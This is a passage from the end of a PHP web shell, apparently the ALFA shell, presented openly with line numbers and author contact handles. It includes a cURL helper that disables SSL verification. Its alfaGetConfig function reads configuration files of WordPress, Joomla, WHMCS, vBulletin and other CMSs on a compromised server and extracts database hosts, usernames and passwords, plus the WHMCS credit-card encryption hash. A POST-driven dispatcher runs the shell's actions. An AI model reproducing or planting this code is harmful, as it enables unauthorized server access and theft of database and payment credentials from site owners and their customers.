6029@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6030$this->cookie_file=$cookie_file;
6031@fclose($this->cookie_file);
6032}
6033}
6034function Send($url,$method="get",$data=""){
6035if(!$this->curl_status){return false;}
6036$process = curl_init($url);
6037curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
6038curl_setopt($process, CURLOPT_HEADER, 0);
6039curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
6040curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
6041curl_setopt($process, CURLOPT_ENCODING , $this->compression);
6042curl_setopt($process, CURLOPT_TIMEOUT, 30);
6043if($this->ssl){
6044curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
6045curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
6046}
6047if($this->cookies){
6048curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
6049curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
6050}
6051if($this->proxy){
6052curl_setopt($process, CURLOPT_PROXY, $this->proxy);
6053}
6054if($method=='post'){
6055curl_setopt($process, CURLOPT_POSTFIELDS, $data);
6056curl_setopt($process, CURLOPT_POST, 1);
6057curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
6058}
6059$return = curl_exec($process);
6060curl_close($process);
6061return $return;
6062}
6063function error($error) {
6064echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
6065die;
6066}
6067}
6068function getConfigHtml($cms){
6069$content = '';
6070$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
6071$content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
6072foreach($cms_array as $key => $val){
6073$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
6074}
6075$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
6076$content .= "</form>";
6077return $content;
6078}
6079function alfaGetConfig(){
6080$cms = $_POST['alfa1'];
6081$path = trim($_POST['alfa2']);
6082$config = array(
6083'wp'=>array('file'=>'/wp-config.php',
6084'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6085'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6086'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6087'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6088'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6089),
6090'drupal'=>array('file'=>'/config.php',
6091'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6092'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6093'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6094'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6095'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
6096),
6097'vb'=>array('file'=>'/includes/config.php',
6098'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6099'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6100'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6101'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6102'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6103),
6104'phpnuke'=>array('file'=>'/config.php',
6105'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6106'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6107'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6108'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6109'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
6110),
6111'smf'=>array('file'=>'/Settings.php',
6112'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6113'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6114'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6115'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6116'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6117),
6118'whmcs'=>array('file'=>'/configuration.php',
6119'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6120'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6121'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6122'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6123'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6124),
6125'joomla'=>array('file'=>'/configuration.php',
6126'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6127'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6128'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6129'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6130'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6131),
6132'phpbb'=>array('file'=>'/config.php',
6133'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6134'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6135'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6136'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6137'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6138),
6139'mybb'=>array('file'=>'/inc/config.php',
6140'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6141'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6142'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6143'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6144'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6145)
6146);
6147$data = array();
6148$srch_host = $config[$cms]['host'][0];
6149$srch_user = $config[$cms]['dbuser'][0];
6150$srch_name = $config[$cms]['dbname'][0];
6151$srch_pw = $config[$cms]['dbpw'][0];
6152$prefix = $config[$cms]['prefix'][0];
6153$file = $config[$cms]['file'];
6154$chost = $config[$cms]['host'][1];
6155$cuser = $config[$cms]['dbuser'][1];
6156$cname = $config[$cms]['dbname'][1];
6157$cpw = $config[$cms]['dbpw'][1];
6158$cprefix = $config[$cms]['prefix'][1];
6159if(@is_dir($path)||_alfa_is_dir($path)){
6160$file=$path.$file;
6161}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
6162$file=$path;
6163}else{
6164return false;
6165}
6166$file = __read_file($file);
6167if(preg_match($srch_host, $file, $mach)){
6168$data['host'] = $mach[$chost];
6169}
6170if(preg_match($srch_user, $file, $mach)){
6171$data['user'] = $mach[$cuser];
6172}
6173if(preg_match($srch_name, $file, $mach)){
6174$data['dbname'] = $mach[$cname];
6175}
6176if(preg_match($srch_pw, $file, $mach)){
6177$data['password'] = $mach[$cpw];
6178}
6179if(isset($prefix)){
6180if(preg_match($prefix, $file, $mach)){
6181$data['prefix'] = $mach[$cprefix];
6182}
6183}
6184if($cms=='whmcs'){
6185if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
6186$data['cc_encryption_hash'] = $mach[3];
6187}
6188}
6189echo json_encode($data);
6190}
6191if(empty($_POST['a']))
6192if(isset($default_action) && function_exists('alfa' . $default_action))
6193$_POST['a'] = $default_action;
6194else
6195$_POST['a'] = 'FilesMan';
6196if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
6197call_user_func('alfa' . $_POST['a']);
6198exit;
6199/*
6200#Persian Gulf For Ever
6201#skype : sole.sad
6202#skype : ehsan.invisible
6203*/
6204?>